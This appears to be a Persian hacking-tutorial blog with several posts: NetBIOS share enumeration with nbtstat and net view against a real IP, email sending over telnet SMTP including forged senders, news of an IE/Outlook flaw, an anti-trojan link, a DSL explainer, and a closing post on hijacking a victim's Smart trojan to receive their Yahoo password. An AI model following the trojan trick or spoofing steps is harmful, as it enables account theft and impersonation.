دستور nbtstat يک ابزار خاص براي کار با NetBIOS است. دقت کنيد که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat داراي پارامتر‌هاي بسياري است که اگه مي‌خواين همه رو ببينين، بنويسين nbtstat و enter را بزنيد.)
حالا بحث اينه که اين دستور چه‌ کاري مي‌کنه و خروجي به چه صورتي است:
اين دستور به ip مورد نظر وصل مي‌شه و از اون مي‌خواد ليست منابعي رو که به اشتراک گذاشته رو ليست کنه. در اين حالت ? حالت ممکنه اتفاق بيوفته:
الف) مواجه با پيغام Host not found بشم. اين يعني اينکه نمي‌تونه ليست منابع را از اون کامپيوتر بگيره (يعني NetBIOS غير فعاله). يعني اگرچه پورت ??? بازه ولي قابل استفاده نيست.
ب) ارتباط برقرار بشه و ليست منابع اشتراکي ليست بشه:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
HOME-TU6U0AV86Y<00> UNIQUE Registered
MSHOME <00> GROUP Registered
HOME-TU6U0AV86Y<20> UNIQUE Registered
MSHOME <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00

?- در اين نتايج چيزي که به درد مي‌خوره، سطري است که <20> دارد. اگه <20> نباشد، يعني نمي‌تونين از اشتراک گذاري فايل استفاده کنيد ( به عبارت ساده تر بي‌خيال شو اين کامپيوتر رو ! ). در اين مثال ما اين سطر را داشتيم پس ادامه مي‌دهيم. حالا مي‌نويسم:

net view \\217.218.84.29
حالا اگه گفتين چي ميشه؟ این سوالو هر کی جواب بده جایزه داره!

ادامه دارد ....

2 نوشته شده در  ساعت 19:38  توسط ابليس | 

- خلاصه درس: در اين درس با پورت ??? ( NetBIOS ) آشنا مي‌شويم.


? چند نکته

?- در تمام درس‌هايي که با عنوان صحبت با پورت‌ها شروع شده است، فقط بحث ارتباط استاندارد با آنها رو گفته‌ام. يعني نخواستم درباره اينکه چگونه از نقاط ضعف آنها ( اصطلاحا Vulnerability ) سوء‌استفاده کنيم، سخني به ميان بيارم. بحث استفاده از Vulnerability ها و اصطلاحا exploit کردن نرم‌افزارهاي هر پورت بعدا مطرح خواهد شد. در مورد اين درس هم همين نکته را رعايت کرده‌ام. همين بحث netbios بعدا کامل‌تر خواهد شد.
?- اگه يادتون باشه قبلا گفتم که بايد سه مورد را خودتون شروع کنيد به ياد گرفتن که عبارت بودند از C ، TCP/IP ، Linux من فرض مي‌کنم که شما در اين مدت اين سه تا رو ياد گرفتين و کم کمک وارد مباحث مربوطه خواهم شد. اگه هنوز اطلاعاتتون کامل نشده، يوخته عجله کنين.
?- مثال‌ مهندسي اجتماعي رو که تو درس ?? براي ياهو گفته بودم، غير فعال کردم که ديگه user جديد قبول نکنه.
?- سعي مي‌کنم تو يکي از درس‌هاي بعدي طريقه نصب لينوکس و نيز نصب مودم رو در اين سيستم‌عامل آموزش بدم چون خيلي ازم مي‌پرسن.

? NetBIOS چيست؟

NetBIOS مخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاري است که اجازه به اشتراک گذاشتن منابع رو به ما مي‌ده. ما براي به اشتراک گذاشتن فايل‌ها و يا پرينتر مي‌تونيم از اين پروتکل استفاده کنيم. نکته مهم اين است که NetBIOS فقط در سيستم‌عامل ويندوز معني داره (اگرچه ابزارهايي مثل Samba در لينوکس مي‌تونن اونو شبيه سازي کنن ولي بحث ما خود پروتکل NetBIOS است). وقتي NetBIOS در ويندوز فعال باشد، بلافاصله سه تا پورت براي استفاده باز مي‌شوند. پورت مهم و اصلي پورت ??? در tcp است که NetBIOS را هم با اين پورت مي‌شناسن. دو پورت ديگر، از نوع udp هستند و عبارتند از پورت ??? براي name service و پورت ??? براي Datagram service . وقتي قرار باشه که يک سيستم‌عامل ويندوز هک بشه ( خصوصا اگه کلاينت باشه ) يکي از اولين مواردي که به ذهن مي‌رسه، استفاده از NetBIOS ه.
حالا ببينيم منظور از به اشتراک گذاشتن (Sharing) در مورد فايل‌ها و پرينتر‌ها چيست؟
به اشتراک گذاشتن در مورد فايل‌ها يعني قرار دادن تعدادي فايل در يک کامپيوتر خاص به طوريکه توسط ساير کامپيوترها قابل دسترسي و استفاده باشه. در مورد پرينتر به اشتراک گذاشتن يعني طوري چاپگر متصل به يک کامپيوتر را تنظيم کنيم که توسط ساير کامپيوتر‌ها هم قابل استفاده باشه. با توجه به اينکه در سيستم‌عامل‌هاي ويندوز به صورت پيش‌فرض NetBIOS فعال است، پس مي‌توان به تعدادي از فايل‌ها و فولدرهاي تعدادي از کامپيوترهاي روي شبکه دسترسي داشت و فايل‌ها را خواند و حتي کپي يا پاک کرد.

2 نوشته شده در  ساعت 1:35  توسط ابليس | 

سلام دوستان , Telnet در اصل پروتکلي است که براي login و استفاده از يک کامپيوتر ديگر به کار مي رود. روش اجراي Telnet در لينوکس يا انواع ديگر Unix و نيز ويندوز 2000 تا حد خيلي زيادي شبيه چيزي است که ما گفتيم. براي آشنايي بيشتر با telnet و گرفتن جواب دقيقتر سوالات بالا روي مـــن کليک کنيد که به يک ميزبان واقعي Telnet شما را متصل مي کند که مي توانيد به رايگان عضو شويد و از خدمات آن استفاده کنيد. خواهيد ديد که لينک فوق در حقيقت Hyper Terminal را باز مي کند. در حقيقت هم اگر به درون Hyper Terminal برويد مي توانيد در قسمت برقراري تماس با انتخاب TCP/IP مستقيما از آن به عنوان Telnet استفاده کنيد. اما اينکه Telnet در هک چه نقشي داره و چه فايده اي داره کلاً رو از زبان "کارولين مينل" برايتان مي نويسم: "فقط با يک سرويسگير Telnet [مثل همين Telnet خودمون در ويندوز] شما مي توانيد:
· ايميل بفرستيد.
· سورس (متن برنامه) سايتها را بخوانيد.
· به ميزبانهاي وب وروديهاي غير منتظره بفرستيد که مي تواند سبب دريافت پاسخهاي شگفت انگيز و گاهي غير قانوني شود.
· به بسياري از ديگر سرويسهاي کامپيوترهاي ميزبان وب ورودي دلخواه خود را بدهيد.
· در سرويسهايي که ميزبانها، روترها و حتي کامپيوترهاي شخصي مردم در منزلشان در اختيار شما مي گذارند کاوش و جستجو کنيد."

تلنت کردن معمولا اولين کاري است که يک هکر براي هک کردن يک سايت انجام ميدهد، زيرا بعضي از پورتها در صورت بسته نبودن روي آن سرور، معمولا حاوي اطلاعات بسيار مهمي هستند.(به همين دليل ما بايد اول پورتها رو چک کنيم بعد telnet چون اگر پورتي که ما بهش telnet ميکنيم close باشه دستور اجرا نميشه) . موضوع مهمي كه يك نفوذ گر واقعي به آن توجه مي كند در سه اصل خلاصه شده است :

۱- او هيچگاه سعي در استفاده از برنامه هايي كه ديگران نوشته اند نمي كند ... »البته ممكن است تعدادي از هكر ها باشند كه با استفاده از تروجان ها يا Back doors ها به اين كار بيپردازند و فقط خود را با اين مباحث ساده درگير کنند.

2- معمولا از به كارگيري برنامه هاي گرافيكي كه حتي خود طراحي كرده اند نفرت دارند و فقط در دنياي سياه و سفيد msdos-prompt براي خود حكومت تشكيل ميدهند.(در اصل از استفاده نرم افزار براي هک نفرت دارند)

3- موضوع سوم و اساسي اين است كه فقط يك چيز را در دنيا ميشناسند و آن هم تايپ كردن است.تايپ در صفحه سياه و سفيد command prompt .

در ويندوز XP، يکي از بهترين ابزارهايي که در دست شماست، همان صفحه مشکي Command prompt است. در ويندوز XP دو نوع DOS وجود دارد. يکي cmd.exe و ديگري command.com که cmd.exe براي کارهاي ما مناسبتر است و کليک روي دگمه Start و انتخاب All programs و انتخاب Accessories و سپس کليک روي Command prompt نيز همين را باز خواهد کرد. (راه مناسبتر: دگمه ويندوز کيبورد را به همراه حرف R فشار دهيد، تايپ کنيد cmd و Enter کيبورد را فشار دهيد). تايپ کردن Help و فشردن Enter ليستي از دستورات را براي شما به نمايش در مي آورد که متاسفانه دستورهاي مناسب براي هک را از قلم انداخته است. (ناگفته نماند که Help ويندوزXP اگر بدانيد که در کجاي آن به دنبال چه بگرديد نسبتاً کامل است). از جمله مهمترين اين دستورها مي توان به دستورات زير اشاره کرد:
TCP/IP command: telnet, netstat, nslookup, tracert, ping, ftp
NetBIOS commands: nbtstat, net use, net view, net localgroup (و چند دستور ديگر)
در اين شماره، براي اينکه هم کمي با telnet (که به عنوان يکي از مهمترين ابزارهاي هک مطرح بوده و هست) آشنا شويد هم از موضوعي شروع کرده باشيم که ملموس و جذاب باشد، فرستادن ايميل از طرف هرکسي به هرکسي با telnet را آموزش مي دهيم (من هم مي دونم که راههاي آسونتري براي اين کار هست و راحتترين راهش استفاده از Outlook مايکروسافت است، اما مطمئنم از ديدن پشت صحنه نمايش فرستادن ايميل لذت خواهيد برد). قبل از هر چيز بگم که telnet کردن به خودي خود جرم نيست و استفاده از telnet براي فرستادن يا گرفتن ايميل نه ضرري براي شما دارد و نه ميزبان. اما شما اين حق را نداريد که از طرف کسي به کس ديگر ايميل بزنيد مگر با اجازه آنها.اول وارد صفحه سياه خط فرمان شويد (مراحل نوشته شده در بالا)، حالا مي خواهيم از دستور telnet استفاده کنيم: telnet target port به جاي target آدرس سايت يا کامپيوتر و به جاي port بايد آدرس پورت را وارد کنيد. در مثال اين شماره با فرستادن ايميل (smtp) سروکار داريم که پورت آن 25 است و آدرس نيز آدرس يک سرور ايميل بايد باشد. به عنوان مثال telnet mail.hamsafar.com 25 را خواهيم داشت. همسفر، وب سايت من که عضويت در آن را به شما توصيه مي کنم، فقط يک مثال است و شما مي توانيد از هر آدرس مشابهي استفاده کنيد. جوابي دريافت خواهيد کرد که معمولا شامل نام ميزبان ايميل است. حالا وقت سلام کردن با دستور helo است (دستور ehlo هم داريم که مي توانيد امتحانش کنيد). بهتر است جلوي helo آدرس ايميل فرستنده را درج نماييد. با گرفتن جواب سلام، براي فرستادن ايميل از دستور mail استفاده مي کنيم:mail from leyli@masalan-ye-sity.com بعد از گرفتن OK حالا گيرنده را معرفي مي کنيم: rcpt to: majnoon@hamsafar.com اين بار بعد از گرفتن OK دستور data را تايپ و Enter کنيد. توجه کنيد که ميزبان به شما مي گويد وقتي کارتان تمام شد . بزنيد که اين يعني زدن يک Enter، تايپ کردن يک نقطه و دوباره زدن Enter. حالا وقت وارد کردن Subject، to و from و سپس زدن دو Enter و وارد کردن متن ايميل و سپس زدن Enter، تايپ کردن نقطه و زدن Enter دوم است. در عکس بالا فقط Subject وارد شده است. نمونه کاملتري که شامل To و From مي باشد به صورت زير است:

data
354 ok, send it; end with .
From: Leyli@masalan-ye-sity.com
To: Majnoon@hamsafar.com
Subject: Salam!

In email faghat be ghasde azmayesh ferestade shode ast.
Rooze khooby dashte bashid
.
250 Message queued

به تفاوت اين دو مورد در عکس زير توجه کنيد:

توجه کنيد که همسفر فقط به شما اجازه خواهد داد به آدرسهايي که به hamsafar.com ختم مي شوند ايميل بزنيد. اگر تمايل به خريد ايميل روي همسفر (webmail & pop3) را داريد، با ما به آدرس sales@hamsafar.com مکاتبه کنيد. اما دستوراتي که گفته شد روي هر ميزباني کار خواهد کرد. به احتمال زياد جايي که از آن اينترنت گرفته ايد اگر درخواست ايميل POP3 از آنها بکنيد به رايگان به شما خواهند داد و شما آدرسي که به عنوان SMTP يا Outgoing server از آنها دريافت مي کنيد را به جاي mail.hamsafar.com خواهيد نوشت. در هر صورت شما اين اجازه را داريد که با روش فوق با من به آدرس ehssanr@hamsafar.com مکاتبه کنيد و به اين شکل روش را آزمايش کنيد. به ياري خدا در شماره آينده با آموزش نحوه نصب و استفاده از ميزبان SMTP خود ويندوز XP، خواهيد آموخت که چگونه بي نياز از هر SMTP ايميل بفرستيد. حالا که به اينجا رسيديم اميدوارم اين سه سوال براي شما پيش آمده باشد که اگر جوابشان را هم مي دانستيد که هيچ وگرنه ما به آنها جواب مختصر و مفيد خواهيم داد. اگر هم هيچ سوالي برايتان پيش نيامده اين قسمت را باز هم به دقت بخوانيد چرا که مهمترين مفاهيم را به سادگي توضيح داده ايم. باز هم تاکيد مي کنم که اين سه سوال و پاسخ آنها را با دقت بخوانيد و بفهميد.
چند نکته مهم :
سوال : اسم Target که در قالب Telnet target port مطرح کرديم چيست و چرا برخي به جاي آن 4 تا عدد مي زنند؟
پاسخ: هر کامپيوتر روي اينترنت با 4 عدد بين 0 تا 255 که با نقطه از هم جدا مي شوند مشخص مي شود. در XP براي فهميدن IP خود کافي است که روي مانيتورهاي نشاندهنده اتصال شما به اينترنت دابل کليک کنيد و از بالاي پنجره ظاهر شده با انتخاب قسمت جزئيات (Details) آدرس IP خود را خواهيد ديد.(براي کساني که ويندوز قديمي دارند معمولا يک راه مناسب تايپ کردن winipcfg در پنجره Run و فشردن Enter است). حال وقتي که کسي يک Domain ثبت مي کند، در واقع روي اين عددها يک اسم مي گذارد. اين کار دو فايده اساسي دارد. يکي اينکه اگر عدد فرد به هر دليل عوض شود لازم نيست دوباره به همه خبر دهد و دليل ديگر آن اين است که اسم ساده تر به خاطر سپرده مي شود و احتمال اشتباه در آن کمتر است. همانطور که مي بينيد تشبيه IP به شماره تلفن تا حدي به فهم آن کمک خواهد کرد. در اينجا قصد نداريم وارد بحث دقيق IP بشويم اما دو عدد اول IP حتما به اينکه از کجا اينترنت داريد مربوط است و به طور تئوري با داشتن IP شما مي توان مکان شما را به صورت فيزيکي هم در روي کره زمين مشخص کرد. براي دانستن IP يک سايت کافي است که از داخل Command Prompt، دستور Ping را اجرا کنيد. به سادگي تايپ کنيد Ping yahoo.com يا Ping hamsafar.com تا IP را ببينيد. پس حالا ديديد که در واقع منظور از Target شماره آن کامپيوتري است که قصد داريد به آن متصل شويد.
(مفهوم Port و کمي از پروتکل Telnet:)
سوال : اصطلاح port که در قالب Telnet target port مطرح کرديم چيست و چرا ما آنرا برابر 25 گرفتيم؟ اگر جاي آن را خالي بگذاريم چه مي شود؟
ترجمه کلمه port به فارسي "بندر" مي شود. کامپيوتر مقصد را به صورت جزيره اي تصور کنيد که چندين بندر دارد و هرکدام تخصص خاص خود را دارند. يکي براي نفتکشهاست يکي براي صادرات سنگ معدن و... . Port روي کامپيوتر هم در حقيقت همچين مفهومي داره. Port کامپيوتر جايي است که اطلاعات مي توانند از آن خارج يا به آن وارد شوند. کيبورد، پرينتر، نمايشگر و مودم از پورتهايي هستند که به راحتي از آنها درک فيزيکي داريد اما پورتهاي مجازي توسط نرم افزار ايجاد مي شوند. وقتي پورت مودم شما به اينترنت متصل مي شود، کامپيوتر شما مي تواند هر کدام از پورتها را که تعدادشان بيش از 65000 عدد است ببندد يا باز بگذارد و نيز مي تواند به هر کدام از اين پورتهاي يک کامپيوتر ديگر متصل شود (البته در صورتي که آن کامپيوتر بر روي اين پورت چيزي در حال اجرا داشته باشد و نيز ديوارآتش (firewall) آن را نبسته باشد. (در ويندوز XP هنگامي که اينترنت خود را تنظيم مي کنيد اين امکان را به شما مي دهد که با استفاده از ديوار آتش جلوي نفوذ ديگران به شما را بگيرد که به طور پيش فرض خودش آنرا فعال مي کند). پورتهاي خاص کاربردهاي خاص دارند. پورت 25 معمولا براي SMTP (مخفف Simple mail transfer protocol ) است و ما براي ارسال ايميل از آن استفاده کرديم. اگر قصد دريافت ايميلهايمان را داشتيم به چورت 110 سر مي زديم، براي مشاهده صفحات وب به سراغ پورت 80 مي رويم و... (درست حدس زديد! Outlook هم به طور پيش فرض براي ارسال ايميل از پورت 25 و براي دريافت آن از پورت 110 استفاده مي کند و اينترنت اکسپلورر هم به پورت 80 شماره IP آدرس سايتي که مي نويسيد سر مي زند.) و در پايان اگر پورت را ننويسيد، پورت برابر 23 فرض مي شود که پورت Telnet است. به پاسخ سوال اول دوباره سر بزنيد. وقتي روي لينکي که داده ام کليک مي کنيد در حقيقت به پورت 23 آن ميزبان متصل مي شويد. امروزه بسياري از سايتها بخصوص سايتهايي که از ميزباني ويندوزي استفاده مي کنند سرويس Telnet ندارند و امکان اتصال به پورت 23 وجود ندارد اما من باز هم توصيه مي کنم که براي تجربه Shell Account هم که شده Telnet واقعي را تجربه کنيد. اين Telnet در حقيقت معمولا يک BBS هم هست اما امکانات بسيار زيادي هم براي يک هکر دارد. براي آشنايي اوليه صرف اينکه کمي انگليسي بفهميد و هرموقع گير کرديد تايپ کنيد Help و Enter کنيد بايد کافي باشد.
سوال :آدرس مورد استفاده در Telnet براي سايتهاي مختلف را چگونه پيدا کنيم؟
پاسخ:اگرچه بسياري از سايتها از همان mail.domain-name.com استفاده مي کنند، اين امر همه گير نيست. در ويندوز و با استفاده از cmd.exe خودمان به راحتي مي توانيم اين آدرس را براي 99% دومينها تعيين کنيم. پس از اجراي cmd، دستور nslookup را با تايپ کردن اين کلمه و فشردن Enter اجرا کنيد. از آنجايي که ما قصد گرفتن اطلاعات در مورد سامانه دريافت ايميل آن سايت را داريم، از کد mx که مخفف mail exchanger است استفاده مي کنيم. به طور کلي اطلاعات يک domain شامل چند قسمت است که براي مورد ما فقط اين اطلاعات مورد نياز است. پس تايپ کنيد set q=mx و Enter را فشار دهيد. حال کافي است نام domain را تايپ و Enter کنيد.
در برخي موارد مانند مثال زير فقط يک جواب مي گيريد:
> irib.com
Server: UnKnown
Address: 213.165.123.1

irib.com MX preference = 60, mail exchanger = mail.irib.com
mail.irib.com internet address = 62.220.119.60
و يا مثال زير:

irna.com MX preference = 10, mail exchanger = irna.com
irna.com nameserver = ns1.gpg.com
irna.com nameserver = ns1.irna.net
irna.com nameserver = ns1.simorgh.com
irna.com nameserver = ns2.irna.net
irna.com internet address = 209.1.163.101
ns1.irna.net internet address = 217.25.48.18
ns1.irna.net internet address = 194.126.61.8
ns2.irna.net internet address = 194.126.61.7
ns2.irna.net internet address = 217.25.48.17
که نشان مي دهد براي آدرس irib.com بايد از mail.irdir.com استفاده کرد و براي آدرس irna.com بايد از irna.com استفاده کرد. به قسمت قرمز رنگ دقت کنيد. هميشه پاسخ مورد نظر ما بعد از عبارت mail exchanger قرار مي گيرد. گاهي تعداد جوابها بيشتر است:
hamsafar.com MX preference = 10, mail exchanger = mail.hamsafar.com
hamsafar.com MX preference = 15, mail exchanger = hamsafar.com
mail.hamsafar.com internet address = 38.118.143.98
hamsafar.com internet address = 38.118.143.98
و يا مثال زير:
hotmail.com MX preference = 5, mail exchanger = mx4.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx1.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx2.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx3.hotmail.com
hotmail.com nameserver = ns1.hotmail.com
hotmail.com nameserver = ns2.hotmail.com
hotmail.com nameserver = ns3.hotmail.com
hotmail.com nameserver = ns4.hotmail.com
mx4.hotmail.com internet address = 65.54.254.151
mx4.hotmail.com internet address = 65.54.253.230
mx1.hotmail.com internet address = 65.54.254.129
mx1.hotmail.com internet address = 65.54.252.99
mx1.hotmail.com internet address = 65.54.166.99
mx2.hotmail.com internet address = 65.54.254.145
mx2.hotmail.com internet address = 65.54.252.230
mx2.hotmail.com internet address = 65.54.166.230
mx3.hotmail.com internet address = 65.54.254.140
mx3.hotmail.com internet address = 65.54.253.99
ns1.hotmail.com internet address = 216.200.206.140
ns2.hotmail.com internet address = 216.200.206.139
ns3.hotmail.com internet address = 209.185.130.68
ns4.hotmail.com internet address = 64.4.29.24
و يا مثال زير:
cnn.com MX preference = 10, mail exchanger = atlmail4.turner.com
cnn.com MX preference = 20, mail exchanger = atlmail2.turner.com
cnn.com MX preference = 30, mail exchanger = nymail1.turner.com
cnn.com MX preference = 10, mail exchanger = atlmail1.turner.com
cnn.com nameserver = twdns-04.ns.aol.com
cnn.com nameserver = twdns-01.ns.aol.com
cnn.com nameserver = twdns-02.ns.aol.com
cnn.com nameserver = twdns-03.ns.aol.com
atlmail1.turner.com internet address = 64.236.240.146
atlmail4.turner.com internet address = 64.236.221.5
atlmail2.turner.com internet address = 64.236.240.147
nymail1.turner.com internet address = 64.236.180.95
اگر کمي دقت کنيد، قسمت MX preference همواره داراي يک عدد است. اگر جوابهاي متفاوتي پيدا شد، جوابي که عدد MX preference آن کمتر باشد به طور معمول انتخاب مناسبتري است و بايد اولين جوابي باشد که امتحان مي کنيد. با اين روش شما مي توانيد بدون استفاده از SMTP خاصي ايميلهاي خود را ارسال کنيد يا برنامه اي بنويسيد که ايميل ارسال کند. سوالي که در اينجا پيش مي آيد اين است که چه کارهايي در اين زمينه مجاز و چه کارهايي غيرقانوني است. فرستادن ايميل به هزاران نفر طوري که به هر کدام فقط يک ايميل برسد و آنها راهي براي خروج از ليست شما داشته باشند غيرقانوني نيست اما ممکن است ISP يا Host شما را عصباني کند، بنابراين بهتر است از آنها سوال کنيد يا حداقل مطمئن باشيد که در قراردادي که با آنها امضا کرده ايد ممنوعيت اين مورد ذکر نشده باشد. البته اگر اين ايميل طوري فرستاده شود که فرستنده آن صحيح نباشد و به نظر برسد که از طرف کس ديگري آمده است قابل پيگرد قانوني است و افراد زيادي در دنيا به اين دليل محاکمه شده اند. فرستادن چندين ايميل به يک فرد طوري که سبب مزاحمت وي يا از دست رفتن برخي از اطلاعات وي شود جرو است و از طريق مراجع ذيصلاح قابل پيگرد قانوني مي باشد. فرستادن ايميل طوري که به نظر برسد از آدرسي ديگر آمده است، اگر آن آدرس ديگر متعلق به شما نباشد علاوه بر غير اخلاقي بودن عمل، انشاءالله قابل پيگيري قانوني مي باشد. از توضيح نصب و کار با SMTP روي ويندوز شخصي منصرف شديم، اما همين قدر بدانيد که از control panel-> add/remove programs بايأ به قسمت add/remove windows components برويد و از آنجا IIS و Message queuing را نصب کنيد و سپس در صورت نياز آنها را تنظيم کنيد. به اين شکل شما قادر به فرستادن ايميل با telnet کردن به آدرس localhost يا آدرس IP 127.0.0.1 به هر آدرسي خواهيد بود. اميدوارم بعد از خواندن اين صفحات به اين نتيجه رسيده باشيد که هرکسي به راحتي مي تواند هر ايميلي را از طرف کس ديگري براي شما ارسال کند و در مورد ايميلهاي مشکوک بايد احتياط کنيد. البته مشکلات ايميل به اينجا ختم نمي شود... ايميل را به طور معمول به کارت پستال بدون پاکت تشبيه مي کنند به اين مفهوم که در مسير رايانه شما به رايانه گيرنده نامه در تمام مسيرهاي مياني و توسط پستچيها قابل خواندن است! اگرچه متاسفانه در ايران به دليل اهميت ندادن به امنيت اطلاعات، تمامي مکالمات تلفني (بخصوص تلفن همراه)، فکس و مانند آنها هم همين حکم را دارند و در مقايسه وضع ايميل کمي بهتر است (بعد بگيد چرا تجارت الکترونيکي نداريم... يا بگيد چرا بانکها خودشون برا خودشون شبکه راه مي اندازند يا...)!
سوال :جگونه مي شود به يک پورت باز telnet کرد؟
پاسخ:براي اينکه عملکرد يک پورت براي شما روشن شود، بايد به آن پورت Telnet کنيد.البته معمولا تعدادي از پورتهايي را که ممکن است اطلاعاتي مهم را در اختيار هکرها قرار دهند مثل پورت ۷۹ يا ۸۰ معمولا بسته است و ارتباط با آنها شايد برقرار نشود. براي telnet کردن در command prompt دستور زير را تايپ کنيد:
telnet hostname portnum
در اين دستور بهجاي hostname شماره ip و يا نام سايت را وارد ميکنيد و بهجاي portnum شماره پورت توجه کنيد که فقط در صورتي ميتوانيد با يک پورت تلنت کنيد که ان پورت open باشد .
مثلا براي تلنت کردن به پورت ۱۳ که ساعت و تاريخ را بهدست ميدهد در کامپيوتري با IP :
۱۹۲.۱۶۸.۱۰۰.۳۵ مينويسيد:
telnet 192.168.100.35 13
يا اگر ip سايت مورد نظر رو بلد نبوديد (بعد روش بدست اوردن ip رو هم ميگم) ميتوانيد از اين راه استفاده کنيد:
telnet yahoo.com 13

                       منبه: EZRA!!!L SECURITY TEAM 

2 نوشته شده در  ساعت 14:16  توسط ابليس | 

سلام دوستان
اخیرا کمپای تحقیقاتی eEye Digital Security یک حفره ی امنیتی بسیار مهم در برنامه ی اینترنت اکسپلورر و آیتلوک مایکروسافت را کشف کرده است. این حفره در ۹ آپریل ۲۰۰۵ کشف شد. eEye اعلام کرده است که آسیب پذیری به کد های مخرب این امکان را می دهد تا از راه دور بر کامپیوتر کاربر اجا شوند Ben Nagy مهندس ارشد امنیتس eEye روز جمعه اعلام داشت : "گرچه این حفره امکان نفوذ و پخش کرم ها در سیستم را نمی دهد اما می تواند عامل بالقوه ای برای حمله کنندگان و نصب تروجان باشد بدون اینکه افراد از این امر مطلع شوند." Nagy اظهار داشت  : "اگر کابری به طور ناخواسته  وارد سایتی شود که حامل یک کد مخرب باشد به احتمال زیاد آلوده خواهد شد" Nagy اعلام کرد " eEye چند روز پیش Bill Gates را از وجود این حفره هنگام نصب پیش فرض Outlook و IE با خبر ساخته بود . "ضمنا مایکرسافت اعلام داشت که نتیجه ی تحقیقات خود در مورد این آسیب پذیری را به طور محرمانه انتشار داده است Nagy در پایان اطهار داشت " مایکروسافت وجود این آسیب پذیری را تایید کرده است اما من شک دارم که آنها خارج از چرخه ی ماهیانه خود اقدام به ارائه ی وصلهی امنیتی نمایند.

اقتباص از مجله ی Gulf News
مترجم : ابلیس
کلیه ی خق کپی رایت محفوظ به این ویلاگ است و هرگونه کپی برداری با ذکر منبع
بلامانع می باشد

2 نوشته شده در  ساعت 17:25  توسط ابليس | 

آنتی تروجاني خیلی خیلی کم حجمی كه امروز معرفي مي كنم براي اينكه اگه با تروجانی مثل مجیک یا ps smartیا هر تروجان دیگه هک شدید فقط با اجرای این برنامه می تونید فایل سرور رو از بین ببرید.

                      
برای دانلود برنامه اینجا کلیک کنید

منبع: www.irboys.com

2 نوشته شده در  ساعت 2:45  توسط ابليس | 

DSL مخفف Digital Subscriber Line ،است كه يك فناوري براي استفاده از خطوط تلفن براي دسترسي سريع (يه خورده سريعتر از اينترنت هاي معمولي) به اينترنت است. اين تكنولوژي مزاياي زيادي دارد كه پرداختن به همه آنها از حوصله اين مقاله خارج است. تنها به دو جنبه پر طرفدار و معروف آن اشاره مي كنيم. با استفاده از تكنولوژي DSL شما مي توانيد، با استفاده از يك خط تلفن، همزمان هم به اينترنت متصل باشيد و هم به تماسهاي تلفني خود به طور مجزا بپردازيد. بدين صورت كه همزمان با اتصال به اينترنت به منزل دوستان و آشنايان زنگ بزنيد و از سايتي كه همزمان از طريق اينترنت مي بينيد آنها را مطلع سازيد، حتي دوست ديگرتان كه همزمان با اين كارها به شما زنگ مي زند را زياد پشت خط منتظر نگذاريد و با او هم صحبت كنيد! اينها شد يك مزيت اين تكنولوژي.
مزيت دوم آن اين است كه سرعت آن !كمي بيشتر! از سرعت اتصال اينترنت هاي معمولي است (حدود 27 تا 147 برابر سرعت اينترنت معمولي كه حداقل آن را 56K فرض كنيم!). سرعت اين فناوري بين 1.5 Mbps تا 8Mbps مي باشد كه تفاوت بين اين دو عدد به ميزان فاصله تا سرويس دهنده اينترنت و اشغال بودن خط تلفن بستگي دارد. حتما مي پرسيد چه طور امكان دارد؟ پس بگذاريد براتون تخصصي تر توضيح دهم. اگر همين خطوط درپيت تلفن تهران خودمون را در نظر بگيريم به طور پيش فرض پهناي باندي معادل 247 كيلو هرتز برخوردار است. يك تماس تلفني صوتي حداكثر حدود 4 كيلو هرتز از اين باند را اشغال مي كند. حال اگر بتوان با فيلتري اين 4 كيلو هرتز كانال صوتي را از بقيه باند جدا كرد، آنوقت ما 243 كيلو هرتز باند آزاد خواهيم داشت، كه مي توان با اين ميزان پهناي باند، با سرعتي حداقل حدود 1536 K به اينترنت متصل شد كه در صورت داشتن فاصله كمتر از 2 كيلومتر با ISP اين سرعت به ميزان 8192 K افزايش مي يابد كه در مقايسه با حداكثر سرعت اينترنت هاي معمولي 56 K اختلافي چشمگير ديده مي شود، تازه امكان آزاد بودن خط تلفن براي برقراي ارتباط تلفني را هم به آن اضافه كنيد. علت اختلاف سرعت خطوط DSL كه ارتباط مستقيم با سرعت اينترنت دارد، تفاوت سيگنالهاي صوتي با اطلاعات است.
در مراكز تلفني دستگاههايي وجود دارد كه براي تقويت كانالهاي صوتي به كار مي روند، ولي اطلاعات (DATA) نمي توانند از آنها عبور كنند. به همين دليل است كه هر چه مراكز سوئيچينگ مخابرات بين شما و ISP شما كمتر باشد، سرعت تبادل اطلاعات نيز بيشتر مي شود، (حالا مي بيني از فردا همه يكي يه متر دستشون دارن خيابون متر مي كنن!) ولي باز با در نظر گرفتن اين كاهش سرعت حداقل سرعت باز بين همان 1536 K تا 8192 K مي باشد كه 27 تا 147 برابر سرعت كنوني اينترنت (در تهران) مي باشد. البته اين رو هم بگم كه هزينه استفاده از اين فناوري در ايران به واسطه استفاده بسيار زيادي كه توسط آن از اينترنت به عمل مي آيد، به طور سرسام آوري بالاست و براي استفاده هاي شخصي به صرفه نيست.
اميد دارم كه از مطلب اين سري هم استفاده لازم را كرده باشيد.

منبع: www.2darebaz.com

2 نوشته شده در  ساعت 18:30  توسط ابليس | 

خوب حالا مي خوام يه زره در مورد باگ اسمارت با شما حرف بزنم
شما برنامه ي اسمارت رو خوب مي شناسيد
كسي كه سرور اين برنامه بر روي كامپيوترش باشه قرباني گفته مي شه
حالا من مي خوام توضيح بدم كه چه شكلي وقتي طرف سرور اسمارت داره حالا اين سرور پسورد رو به هر آي دي كه مي فرسته بهش جهت بديد و كاري كنين كه قرباني پسوردش براي شما بياد


1-بايد طرف سرور داشته باشه حالا اين سرور به هر آي دي مي خواد بره
2-امتحانش هيچ ضرري نداره

آموزش


خيلي راحته وقتي طرف آنلاين شد 2 سه تا پي ام بهش ميديد سرور مياد به كسي كه سرور رو فرستاده pm بده ولي ياهو مسنجر گير مي كنه سرور اشتباه مي كنه و پسورد رو براي شما مي فرسته و شما صاحب پسورد قرباني ميشيد و اين شكلي به سرور جهت مي ديد

منبع : www.iranstars.com
نويسنده : آرش هکر

2 نوشته شده در  ساعت 15:3  توسط ابليس |